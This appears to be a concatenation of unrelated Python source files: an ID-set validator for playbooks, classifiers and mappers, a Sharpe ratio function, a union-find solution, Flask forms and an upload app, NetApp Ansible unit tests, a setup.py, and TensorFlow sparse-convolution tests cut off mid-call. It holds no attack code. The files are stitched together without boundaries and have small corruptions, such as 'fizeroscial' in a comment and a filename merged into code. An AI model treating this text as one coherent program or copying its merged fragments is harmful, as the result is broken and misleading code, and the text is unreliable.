is_valid_classifier and is_valid_mapper def _is_classifier_incident_types_found(self, classifier_data): """Check if the classifier incident types were found Args: classifier_data (dict): Dictionary that holds the extracted details from the given classfier. Returns: bool. Whether the classifier related incident types are found. """ is_valid = True classifier_incident_types = set(classifier_data.get('incident_types', set())) if classifier_incident_types: # setting initially to false, if the incident types is in the id_set, it will be valid is_valid = False for incident_type in self.incident_types_set: incident_type_name = list(incident_type.keys())[0] # remove a related incident types if exists in the id_set if incident_type_name in classifier_incident_types: classifier_incident_types.remove(incident_type_name) if not classifier_incident_types: break if not classifier_incident_types: # if nothing remains, these incident types were all found is_valid = True else: # there are missing incident types in the id_set, classifier is invalid error_message, error_code = Errors.classifier_non_existent_incident_types( str(classifier_incident_types)) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _is_mapper_incident_types_found(self, mapper_data): """Check if the classifier incident types were found Args: mapper_data (dict): Dictionary that holds the extracted details from the given mapper. Returns: bool. Whether the classifier related incident types are found. 
""" is_valid = True mapper_incident_types = set(mapper_data.get('incident_types', set())) if mapper_incident_types: # setting initially to false, if the incident types is in the id_set, it will be valid is_valid = False for incident_type in self.incident_types_set: incident_type_name = list(incident_type.keys())[0] # remove a related incident types if exists in the id_set if incident_type_name in mapper_incident_types: mapper_incident_types.remove(incident_type_name) if not mapper_incident_types: break if not mapper_incident_types: # if nothing remains, these incident types were all found is_valid = True else: # there are missing incident types in the id_set, mapper is invalid error_message, error_code = Errors.mapper_non_existent_incident_types(str(mapper_incident_types)) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _are_playbook_entities_versions_valid(self, playbook_data, file_path): """Check if the playbook's version match playbook's entities (script , sub-playbook, integration) Args: playbook_data (dict): Dictionary that holds the extracted details from the given playbook. file_path (string): Path to the file (current playbook). Returns: bool. Whether the playbook's version match playbook's entities. """ playbook_data_2nd_level = playbook_data.get(list(playbook_data.keys())[0]) playbook_name = playbook_data_2nd_level.get("name") playbook_version = playbook_data_2nd_level.get("fromversion") playbook_scripts_list = playbook_data_2nd_level.get("implementing_scripts", []) sub_playbooks_list = playbook_data_2nd_level.get("implementing_playbooks", []) playbook_integration_commands = self.get_commands_to_integration(playbook_name, file_path) if not self.is_entity_version_match_playbook_version(sub_playbooks_list, playbook_version, self.playbook_set, playbook_name, file_path): return False if not self.is_entity_version_match_playbook_version(playbook_scripts_list, playbook_version, self.script_set, playbook_name, file_path): return False if not self.is_playbook_integration_version_valid(playbook_integration_commands, playbook_version, playbook_name, file_path): return False return True def is_subplaybook_name_valid(self, playbook_data, file_path): """Checks whether a sub playbook name is valid (i.e id exists in set_id) Args: playbook_data (dict): Dictionary that holds the extracted details from the given playbook. {playbook name: playbook data (dict)} file_path (string): Path to the file (current playbook). Return: bool. if all sub playbooks names of this playbook are valid. """ # Get a dict with all playbook fields from the playbook data dict. playbook_data_2nd_level = playbook_data.get(list(playbook_data.keys())[0]) main_playbook_name = playbook_data_2nd_level.get("name") sub_playbooks_list = playbook_data_2nd_level.get("implementing_playbooks", []) for playbook_dict in self.playbook_set: playbook_name = list(playbook_dict.values())[0].get('name') if playbook_name in sub_playbooks_list: sub_playbooks_list.remove(playbook_name) if sub_playbooks_list: error_message, error_code = Errors.invalid_subplaybook_name(sub_playbooks_list, main_playbook_name) if self.handle_error(error_message, error_code, file_path): return False return True def get_commands_to_integration(self, file_name, file_path): """ gets playbook's 'command_to_integration' dict from playbook set in id_set file. Args: file_name (string): Name of current playbook. file_path (string): : Path to the playbook file. Returns: dictionary. 
Playbook's 'command_to_integration' dict. """ commands_to_integration = {} for playbook_dict in self.playbook_set: playbook_name = list(playbook_dict.keys())[0] playbook_path = playbook_dict[playbook_name].get("file_path") is_this_the_playbook = playbook_name == file_name and file_path == playbook_path if is_this_the_playbook: playbook_data = playbook_dict[playbook_name] commands_to_integration = playbook_data.get("command_to_integration", {}) return commands_to_integration return commands_to_integration def is_entity_version_match_playbook_version(self, implemented_entity_list_from_playbook, main_playbook_version, entity_set_from_id_set, playbook_name, file_path): """Check if the playbook's version match playbook's entities (script or sub-playbook) Goes over the relevant entity set from id_set and check if the version of this entity match is equal or lower to the main playbook's version. For example, for given scripts list : implemented_entity_list_from_playbook = ["script1", "script2"], main playbook version = "5.0.0". This code searches for script1 version in the scripts set (in id_set) and returns True only if script1 version <= "5.0.0." (main playbook version), otherwise returns False. Does the same for "script2". Args: implemented_entity_list_from_playbook (list): List of relevant entities yo check from playbook. For example, list of implementing_scripts or list of implementing_playbooks. main_playbook_version (str): Playbook's from version. entity_set_from_id_set (dict) : Entity's data set (scripts or playbooks) from id_set file. playbook_name (str) : Playbook's name. file_path (string): Path to the file (current playbook). Returns: bool. Whether the playbook's version match playbook's entities. """ for entity_data_dict in entity_set_from_id_set: if not implemented_entity_list_from_playbook: return True entity_id = list(entity_data_dict.keys())[0] all_entity_fields = entity_data_dict[entity_id] entity_name = entity_id if entity_id in implemented_entity_list_from_playbook else all_entity_fields.get( "name") is_entity_used_in_playbook = entity_name in implemented_entity_list_from_playbook if is_entity_used_in_playbook: entity_version = all_entity_fields.get("fromversion", "") is_version_valid = not entity_version or LooseVersion(entity_version) <= LooseVersion( main_playbook_version) if is_version_valid: implemented_entity_list_from_playbook.remove(entity_name) if implemented_entity_list_from_playbook: error_message, error_code = Errors.content_entity_version_not_match_playbook_version( playbook_name, implemented_entity_list_from_playbook, main_playbook_version) if self.handle_error(error_message, error_code, file_path): return False return True def is_playbook_integration_version_valid(self, playbook_integration_commands, playbook_version, playbook_name, file_path): """Check if the playbook's version match playbook's used integrations. Goes over all the integrations' commands that used in the current playbook. For each command, checks its integration's from version. If at least one existing integration was found that integration version <= playbook version, True is returned. If no such integration was found, False returned. Args: playbook_integration_commands (dict): Playbook's 'command_to_integration' dict. playbook_version (str): Playbook's from version . playbook_name (str) : Playbook's name . file_path (string): Path to the file (current playbook) . Returns: bool. Whether the playbook's version match playbook's used integrations. 
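
        Illustrative values (hypothetical names): with playbook_version = "5.5.0" and

            playbook_integration_commands = {"hypothetical-command": ["HypotheticalIntegration"]}

        the command is accepted only if HypotheticalIntegration's fromversion in the id_set is empty or
        <= 5.5.0; commands from GENERIC_COMMANDS_NAMES that list no implementing integration are skipped.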
""" for command in playbook_integration_commands: implemented_integrations_list = playbook_integration_commands[command] # Ignore the error for PB with generic commands that do not depend on specific integration if command in GENERIC_COMMANDS_NAMES and not implemented_integrations_list: continue integration_from_valid_version_found = False for integration in implemented_integrations_list: integration_version = self.get_integration_version(integration) is_version_valid = not integration_version or LooseVersion(integration_version) <= LooseVersion( playbook_version) if is_version_valid: integration_from_valid_version_found = True break if not integration_from_valid_version_found: error_message, error_code = Errors.integration_version_not_match_playbook_version(playbook_name, command, playbook_version) if self.handle_error(error_message, error_code, file_path): return False return True def get_integration_version(self, integration_to_search): general_version = "" # i.e integration has no specific version for integration_dict in self.integration_set: integration_name = list(integration_dict.keys())[0] if integration_name == integration_to_search: integration_data = integration_dict[integration_name] return integration_data.get("fromversion", "") return general_version def is_file_valid_in_set(self, file_path, file_type, ignored_errors=None): """Check if the file is valid in the id_set Args: file_path (string): Path to the file. file_type (string): The file type. ignored_errors (list): a list of ignored errors for the specific file Returns: bool. Whether the file is valid in the id_set or not. """ self.ignored_errors = ignored_errors is_valid = True if self.is_circle: # No need to check on local env because the id_set will contain this info after the commit click.echo(f"id set validations for: {file_path}") if re.match(constants.PACKS_SCRIPT_YML_REGEX, file_path, re.IGNORECASE): unifier = YmlUnifier(os.path.dirname(file_path)) yml_path, code = unifier.get_script_or_integration_package_data() script_data = get_script_data(yml_path, script_code=code) is_valid = self._is_non_real_command_found(script_data) elif file_type == constants.FileType.INCIDENT_TYPE: incident_type_data = OrderedDict(get_incident_type_data(file_path)) is_valid = self._is_incident_type_default_playbook_found(incident_type_data) elif file_type == constants.FileType.INTEGRATION: integration_data = get_integration_data(file_path) is_valid = self._is_integration_classifier_and_mapper_found(integration_data) elif file_type == constants.FileType.CLASSIFIER: classifier_data = get_classifier_data(file_path) is_valid = self._is_classifier_incident_types_found(classifier_data) elif file_type == constants.FileType.MAPPER: mapper_data = get_mapper_data(file_path) is_valid = self._is_mapper_incident_types_found(mapper_data) elif file_type == constants.FileType.PLAYBOOK: playbook_data = get_playbook_data(file_path) playbook_answers = [self._are_playbook_entities_versions_valid(playbook_data, file_path), self.is_subplaybook_name_valid(playbook_data, file_path)] is_valid = all(playbook_answers) return is_valid def _is_pack_display_name_already_exist(self, pack_metadata_data): """Check if the pack display name already exists in our repo Args: pack_metadata_data (dict): Dictionary that holds the extracted details from the given metadata file. Returns: bool. Whether the metadata file is valid or not. 
""" new_pack_folder_name = list(pack_metadata_data.keys())[0] new_pack_name = pack_metadata_data[new_pack_folder_name]['name'] for pack_folder_name, pack_data in self.packs_set.items(): if new_pack_name == pack_data['name'] and new_pack_folder_name != pack_folder_name: return False, Errors.pack_name_already_exists(new_pack_name) return True, None def is_unique_file_valid_in_set(self, pack_path, ignored_errors=None): """Check if unique files are valid against the rest of the files, using the ID set. Args: pack_path (string): Path to the file. ignored_errors (list): a list of ignored errors for the specific file Returns: bool. Whether the file is valid in the id_set or not. string. Error massage if the file is invalid else None. """ self.ignored_errors = ignored_errors is_valid = True error = None if self.is_circle: click.echo(f"id set validations for: {pack_path}") is_valid, error = self._is_pack_display_name_already_exist( get_pack_metadata_data(f'{pack_path}/pack_metadata.json', False)) return is_valid, error functions_legacy/SharpeRatio.py1-10 from numpy import std, mean def SharpeRatio(h,PL,r,v0): # This function computes the Sharpe ratio = (E[Pi_h]-r@v0)/Std[Pi_h] of a portfolio once we know # the risk-free rate r and the current budget v0. # INPUTS: # h :[vector](n_ x 1) holdings # PL : [matrix] (n_ x j_) scenarios for the P&L's of the n_ fizeroscial instruments in the portfolio # r :[scalar] risk-free rate # v0 :[scalar] budget # OP: # ratio :[scalar] Sharpe ratio Pi_h=h.T@PL ExcessPi_h=Pi_h-r@v0 E=mean(ExcessPi_h) Sd=std(Pi_h) ratio=E/Sd return ratio solutions/684/684-yongjoonseo.py1-10 # check # return the answer that occurs last class Solution: def find(self, x, parents): if parents[x] == x: return x parents[x] = self.find(parents[x], parents) return parents[x] def union(self, x, y, parents, ranks): xr = self.find(x, parents) yr = self.find(y, parents) if ranks[xr] >= ranks[yr]: parents[yr] = xr else: parents[xr] = yr if ranks[xr] == ranks[yr]: ranks[xr] += 1 def findRedundantConnection(self, edges: List[List[int]]) -> List[int]: N = len(edges) parents = [i for i in range(N+1)] ranks = [0] * (N+1) result = None for u, v in edges: if self.find(u, parents) == self.find(v, parents): result = (u, v) else: self.union(u, v, parents, ranks) return resultblog/forms.py from flask_wtf import Form from wtforms import TextField, TextAreaField, FloatField, PasswordField, FileField from wtforms import validators from wtforms import ValidationError from .models import User class LoginForm(Form): username = TextField(u'Username', validators=[validators.required()]) password = PasswordField(u'Password', validators=[validators.required()]) def validate(self): check_validate = super(LoginForm, self).validate() # Make sure the input was clean if not check_validate: return False user = User.query.filter_by(username=self.username.data).first() if not user: self.username.errors.append('Invalid username or password') return False elif not user.check_password(self.password.data): self.username.errors.append('Invalid username or password') return False return True class NewUserForm(Form): username = TextField(u'Username') email = TextField(u'Email', validators=[validators.email()]) password = PasswordField(u'Password', validators=\ [validators.EqualTo('', message='Passwords must match.'),\ validators.length(6,64)]) password2 = PasswordField(u'') def validate_username(self, field): if User.query.filter_by(username=field.data).first(): raise ValidationError('Username not available') def validate_email(self, 
field): if User.query.filter_by(email=field.data).first(): raise ValidationError('Email address not available') def validate(self): check_validate = super(NewUserForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class EditProfileForm(Form): username = TextField(u'Username') email = TextField(u'Email', validators=[validators.email()]) password = PasswordField(u'Password', validators=\ [validators.EqualTo('', message='Passwords must match.'),\ validators.length(6,64)]) password2 = PasswordField(u'') api_key = TextField(u'API Key') def validate(self): check_validate = super(EditProfileForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class CreatePostForm(Form): title = TextField(u'Title', validators=[validators.required(), validators.length(max=256)]) text = TextAreaField(u'Content', validators=[validators.required()]) latitude = FloatField(u'Latitude', validators=[validators.required()]) longitude = FloatField(u'Longitude', validators=[validators.required()]) def validate(self): check_validate = super(CreatePostForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class CreateImageForm(Form): title = TextField(u'Title', validators=[validators.required(), validators.length(max=256)]) image = FileField(u'Image', validators=[validators.required()]) caption = TextAreaField(u'Caption', validators=[validators.required(), validators.length(max=512)]) latitude = FloatField(u'Latitude') longitude = FloatField(u'Longitude') def validate(self): check_validate = super(CreateImageForm, self).validate() # Make sure the input was clean if not check_validate: return False return True 0 #!/usr/bin/env python # -*- coding:utf-8 -*- import os from flask import Flask, abort, request, jsonify, redirect, render_template from ext import db, mako from models import PasteFile from libs.utils import humanize_bytes, get_file_path app = Flask(__name__) app.config.from_object('config') mako.init_app(app) db.init_app(app) @app.route('/r/') def rsize(img_hash): w = request.args['w'] h = request.args['h'] old_paste = PasteFile.get_by_filehash(img_hash) new_paste = PasteFile.rsize(old_paste, w, h) return new_paste.url_i @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': uploaded_file = request.files['file'] w = request.form.get('w') h = request.form.get('h') if not uploaded_file: return abort(404) if w and h: paste_file = PasteFile(uploaded_file, w, h) else: paste_file = PasteFile.create_by_upload(uploaded_file) db.session.add(paste_file) db.session.commit() return jsonify({ 'url_d': paste_file.url_d, 'url_i': paste_file.url_i, 'url_s': paste_file.url_s, 'url_p': paste_file.url_p, 'filename': paste_file.filename, 'size': humanize_bytes(paste_file.size), 'time': str(paste_file.uploadtime), 'type': paste_file.type, 'quoteurl': paste_file.quoteurl }) return render_template('index.html', **locals()) @app.after_request def after_request(response): response.headers['Access-Control-Allow-Origin'] = '*' response.headers['Access-Control-Allowe-Headers'] = 'Content-Type' return response @app.route('/j', methods=['POST']) def j(): uploaded_file = request.files['file'] if uploaded_file: paste_file = PasteFile.create_by_upload(uploaded_file) db.session.add(paste_file) db.session.commit() width, height = paste_file.image_size return jsonify({ 'url': paste_file.url_i, 'short_url': paste_file.url_s, 'origin_filename': paste_file.filename, 'hash': 
paste_file.filehash, 'width': width, 'height': height }) return abort(404) @app.route('/p/') def perview(filehash): paste_file = PasteFile.get_by_filehash(filehash) if not paste_file: filepath = get_file_path(filehash) if not(os.path.exists(filepath)) and not(os.path.islink(filepath)): return abort(404) paste_file = PasteFile.create_by_old_paste(filehash) db.session.add(paste_file) db.session.commit() @app.route('/s/') def s(symlik): paste_file = PasteFile.get_by_symlik(symlik) return redirect(paste_file.url_p) if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) """TODO""" import pytest def test_dummy(): """Fake test to get boilerplate going""" assert True # (c) 2020, NetApp, Inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) """ unit tests NetApp StorageGRID Grid Group Ansible module: na_sg_grid_group""" from __future__ import absolute_import, division, print_function __metaclass__ = type import json import pytest import sys try: from requests import Response except ImportError: if sys.version_info < (2, 7): pytestmark = pytest.mark.skip('Skipping Unit Tests on 2.6 as requests is not available') else: raise from ansible_collections.netapp.storagegrid.tests.unit.compat import unittest from ansible_collections.netapp.storagegrid.tests.unit.compat.mock import ( patch, Mock, ) from ansible.module_utils import basic from ansible.module_utils._text import to_bytes from ansible_collections.netapp.storagegrid.plugins.modules.na_sg_grid_group import ( SgGridGroup as grid_group_module, ) # REST API canned responses when mocking send_request SRR = { # common responses "empty_good": ({"data": []}, None), "not_found": ( {"status": "error", "code": 404, "data": {}}, {"key": "error.404"}, ), "end_of_sequence": (None, "Unexpected call to send_request"), "generic_error": (None, "Expected error"), "delete_good": ({"code": 204}, None), "grid_groups": ( { "data": [ { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": True, "maintenance": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } ] }, None, ), "grid_group_record": ( { "data": { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": True, "maintenance": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } }, None, ), "grid_group_record_update": ( { "data": { "displayName": "TestGridGroup", "uniqueName": "group/testgridgroup", "policies": { "management": { "tenantAccounts": True, "metricsQuery": False, "maintenance": True, "ilm": True, }, }, "id": "00000000-0000-0000-0000-000000000000", "federated": False, "groupURN": "urn:sgws:identity::12345678901234567890:group/testgridgroup", } }, None, ), } def set_module_args(args): """prepare arguments so that they will be picked up during module creation""" args = json.dumps({"ANSIBLE_MODULE_ARGS": args}) basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access class AnsibleExitJson(Exception): """Exception class to be raised by module.exit_json and caught by the test case""" pass class AnsibleFailJson(Exception): """Exception class to be raised by module.fail_json and caught by the test case""" pass def exit_json(*args, **kwargs): # pylint: disable=unused-argument 
"""function to patch over exit_json; package return data into an exception""" if "changed" not in kwargs: kwargs["changed"] = False raise AnsibleExitJson(kwargs) def fail_json(*args, **kwargs): # pylint: disable=unused-argument """function to patch over fail_json; package return data into an exception""" kwargs["failed"] = True raise AnsibleFailJson(kwargs) class TestMyModule(unittest.TestCase): """ a group of related Unit Tests """ def setUp(self): self.mock_module_helper = patch.multiple( basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json ) self.mock_module_helper.start() self.addCleanup(self.mock_module_helper.stop) def set_default_args_fail_check(self): return dict( { "display_name": "TestGroup", "management_policy": { "maintenance": True, "ilm": True, "root_access": False, }, "auth_token": "", "validate_certs": False, } ) def set_default_args_pass_check(self): return dict( { "state": "present", "display_name": "TestGroup", "unique_name": "group/testgroup", "management_policy": { "maintenance": True, "ilm": True, "root_access": False, }, "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def set_args_create_na_sg_grid_group(self): return dict( { "state": "present", "display_name": "TestGridGroup", "unique_name": "group/testgridgroup", "management_policy": { "tenant_accounts": True, "metrics_query": True, "maintenance": True, }, "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def set_args_delete_na_sg_grid_group(self): return dict( { "state": "absent", "unique_name": "group/testgridgroup", "api_url": "gmi.example.com", "auth_token": "", "validate_certs": False, } ) def test_module_fail_when_required_args_missing(self): """ required arguments are reported as errors """ with pytest.raises(AnsibleFailJson) as exc: set_module_args(self.set_default_args_fail_check()) grid_group_module() print( "Info: test_module_fail_when_required_args_missing: %s" % exc.value.args[0]["msg"] ) def test_module_fail_when_required_args_present(self): """ required arguments are reported as errors """ with pytest.raises(AnsibleExitJson) as exc: set_module_args(self.set_default_args_pass_check()) grid_group_module() exit_json(changed=True, msg="Induced arguments check") print( "Info: test_module_fail_when_required_args_present: %s" % exc.value.args[0]["msg"] ) assert exc.value.args[0]["changed"] def test_module_fail_with_bad_unique_name(self): """ error returned if unique_name doesn't start with group or federated_group """ with pytest.raises(AnsibleFailJson) as exc: args = self.set_default_args_pass_check() args["unique_name"] = "noprefixgroup" set_module_args(args) grid_group_module() print( "Info: test_module_fail_with_bad_unique_name: %s" % exc.value.args[0]["msg"] ) @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_create_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_create_na_sg_grid_group()) my_obj = grid_group_module() mock_request.side_effect = [ SRR["not_found"], # get SRR["grid_group_record"], # post SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_create_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_idempotent_create_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_create_na_sg_grid_group()) my_obj = grid_group_module() 
mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_idempotent_create_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert not exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_update_na_sg_grid_group_pass(self, mock_request): args = self.set_args_create_na_sg_grid_group() args["management_policy"]["tenant_accounts"] = True args["management_policy"]["metrics_query"] = False args["management_policy"]["ilm"] = False set_module_args(args) my_obj = grid_group_module() mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["grid_group_record_update"], # put SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_update_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] @patch( "ansible_collections.netapp.storagegrid.plugins.module_utils.netapp.SGRestAPI.send_request" ) def test_delete_na_sg_grid_group_pass(self, mock_request): set_module_args(self.set_args_delete_na_sg_grid_group()) my_obj = grid_group_module() mock_request.side_effect = [ SRR["grid_group_record"], # get SRR["delete_good"], # delete SRR["end_of_sequence"], ] with pytest.raises(AnsibleExitJson) as exc: my_obj.apply() print( "Info: test_delete_na_sg_grid_group_pass: %s" % repr(exc.value.args[0]) ) assert exc.value.args[0]["changed"] import os import sys from setuptools import setup, find_packages try: from babel.messages import frontend as babel except ImportError: print "Babel is not installed, you can't localize this package" cmdclass = {} else: cmdclass = { 'compile_catalog': babel.compile_catalog, 'extract_messages': babel.extract_messages, 'init_catalog': babel.init_catalog, 'update_catalog': babel.update_catalog } here = os.path.abspath(os.path.dirname(__file__)) README = open(os.path.join(here, 'README.rst')).read() CHANGES = open(os.path.join(here, 'CHANGES.rst')).read() version = '0.4.9' requires = [ 'eduid_am >= 0.6.0, < 0.7.0', 'vccs_client >= 0.4.1, < 0.5.0', 'wsgi_ratelimit >= 0.1', 'eduid_userdb >= 0.4.0b9', 'eduid_common[webapp]>=0.1.3b5', 'pyramid == 1.5.4', 'pyramid_debugtoolbar == 2.3', 'pyramid_jinja2 == 2.3.3', 'jinja2<2.9', # Templates breaks with jinja2 2.9 'pyramid_mailer == 0.14', 'pyramid_tm == 1.1.1', 'pyramid_sna == 0.3.2', 'waitress == 0.8.9', 'requests >= 2.1.18', # Validate recaptcha with requests 'pwgen == 0.4', 'proquint == 0.2.0', 'gunicorn == 19.3.0', ] if sys.version_info[0] < 3: # Babel does not work with Python 3 requires.append('Babel==1.3') test_requires = [ 'WebTest==1.4.3', 'mock', 'eduid_signup_amp>=0.2.9b0', ] docs_extras = [ 'Sphinx==1.1.3' ] testing_extras = test_requires + [ 'nose==1.2.1', 'coverage==3.6', 'nosexcover==1.0.8', ] waitress_extras = requires + [ 'waitress==0.8.2', ] setup( name='eduid_signup', version=version, description='eduID Sign Up application', long_description=README + '\n\n' + CHANGES, # TODO: add classifiers classifiers=[ # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers ], keywords='identity federation saml', author='', url='https://github.com/SUNET/eduid-signup', license='BSD', packages=find_packages(), include_package_data=True, zip_safe=False, install_requires=requires, tests_require=test_requires, extras_require={ 'testing': testing_extras, 'docs': docs_extras, 'waitress': waitress_extras, }, test_suite='eduid_signup', 
entry_points="""\ [paste.app_factory] main = eduid_signup:main """, ) src/compas/datastructures/mesh/operations/__init__.py from __future__ import print_function, division, absolute_import from .collapse import * from .insert import * from .split import * from .swap import * from .weld import * __all__ = [name for name in dir() if not name.startswith('_')] import tensorflow as tf from tensorflow.python.platform import test from absl.testing import parameterized from custom_helper_op import sparse_conv2d, sparse_conv3d, SparseConv3DLayer import numpy as np from tensorflow.python.ops import gradient_checker_v2 import time # class SparseConv2DTest(test.TestCase, parameterized.TestCase): # @parameterized.parameters( # (1, 500, 500, 30, 20, (3, 3)), # (2, 500, 600, 30, 20, (5, 5)), # ) # def testForward(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]) # filters = np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]) # base_plane = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]) # offsets = np.random.random([BATCH_SIZE, IN_CHANNELS]) # default_value = tf.random.uniform([], dtype=images.dtype) # start = time.time() # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # my_time = time.time() - start # # print(res.numpy()[0, 1, 1, 0], tf.reduce_sum(filters[0, :, :, :]*images[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # images_nn = tf.pad(tf.constant(images, dtype=images.dtype), [[0, 0], [KERNEL_SIZE[0]//2, KERNEL_SIZE[0]//2], [KERNEL_SIZE[1]//2, KERNEL_SIZE[1]//2], [0, 0]], # mode="CONSTANT", constant_values=default_value) # # print(images_nn[0, 0, 0, 0].numpy()) # # print(res.numpy()[0, 0, 0, 0], tf.reduce_sum(filters[0, :, :, :]*images_nn[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # start = time.time() # res_nn = tf.nn.conv2d(images_nn, tf.transpose(tf.constant(filters, dtype=filters.dtype), [1, 2, 3, 0]), strides=(1, 1, 1, 1), padding="VALID", dilations=(1, 1, 1, 1)) # nn_time = time.time() - start # print("my ", my_time/1000, " nn ", nn_time/1000) # self.assertShapeEqual(res.numpy(), res_nn) # self.assertAllClose(res, res_nn) # print(tf.shape(res)) # @parameterized.parameters( # (1, 1024, 2048, 30, 20, (3, 3)), # (2, 1024, 2048, 30, 20, (5, 5)), # ) # def testGradTime(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]), dtype=tf.float32) # filters = tf.convert_to_tensor(np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]), dtype=tf.float32) # base_plane = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]), dtype=tf.float32) # offsets = tf.convert_to_tensor(np.random.random([BATCH_SIZE, IN_CHANNELS]), dtype=tf.float32) # default_value = tf.random.uniform([], dtype=images.dtype) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters, base_plane, default_value]) # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # res = tf.reduce_mean(res) # my_forward_time = time.time() - start # start = time.time() # grad = tape.gradient(res, [images, filters, base_plane, default_value]) # my_backforward_time = time.time() - start # # print(res.numpy()[0, 1, 1, 0], tf.reduce_sum(filters[0, :, :, :]*images[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # images_nn = 
tf.pad(tf.constant(images, dtype=images.dtype), [[0, 0], [KERNEL_SIZE[0]//2, KERNEL_SIZE[0]//2], [KERNEL_SIZE[1]//2, KERNEL_SIZE[1]//2], [0, 0]], # mode="CONSTANT", constant_values=default_value) # # print(images_nn[0, 0, 0, 0].numpy()) # # print(res.numpy()[0, 0, 0, 0], tf.reduce_sum(filters[0, :, :, :]*images_nn[0, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :]).numpy()) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters]) # res_nn = tf.nn.conv2d(images_nn, tf.transpose(filters, [1, 2, 3, 0]), strides=(1, 1, 1, 1), padding="VALID", dilations=(1, 1, 1, 1)) # res = tf.reduce_mean(res_nn) # nn_forward_time = time.time() - start # nn_grad = tape.gradient(res, [images, filters, base_plane, default_value]) # nn_backforward_time = time.time() - start # print("my forward ", my_forward_time/1000, " my backfoward ", my_backforward_time/1000, " nn forward ", nn_forward_time/1000, " nn backforward ", nn_backforward_time/1000) # self.assertShapeEqual(grad[0].numpy(), nn_grad[0]) # self.assertAllClose(grad[0], nn_grad[0]) # @parameterized.parameters( # (1, 10, 20, 30, 20, (3, 3)), # (2, 10, 20, 30, 20, (3, 3)), # ) # def testGradientFloat64(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # @tf.function # def test_check(*args): # cost = sparse_conv2d(*args) # return tf.reduce_mean(cost) # with self.cached_session(): # images = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IN_CHANNELS]) # filters = np.random.random([OUT_CHANNELS, KERNEL_SIZE[0], KERNEL_SIZE[1], IN_CHANNELS]) # base_plane = np.random.random([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1]) # offsets = np.random.random([BATCH_SIZE, IN_CHANNELS]) # default_value = tf.constant(0, dtype=images.dtype) # # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) # theoretical, numerical = gradient_checker_v2.compute_gradient(test_check, [images, filters, base_plane, default_value, offsets]) # # err = gradient_checker_v2.max_error(theoretical, numerical) # self.assertAllClose(theoretical[0], numerical[0]) # self.assertAllClose(theoretical[1], numerical[1]) # # self.assertAllClose(theoretical[2], numerical[2]) # self.assertAllClose(theoretical[3], numerical[3]) class SparseConv3DTest(test.TestCase, parameterized.TestCase): @parameterized.parameters( (1, 128, 160, 16, 32, 4, 3, (3, 3, 3), (1, 1, 1)), (2, 128, 160, 16, 48, 5, 6, (5, 3, 3), (1, 1, 1)), (2, 32, 40, 16, 48, 90, 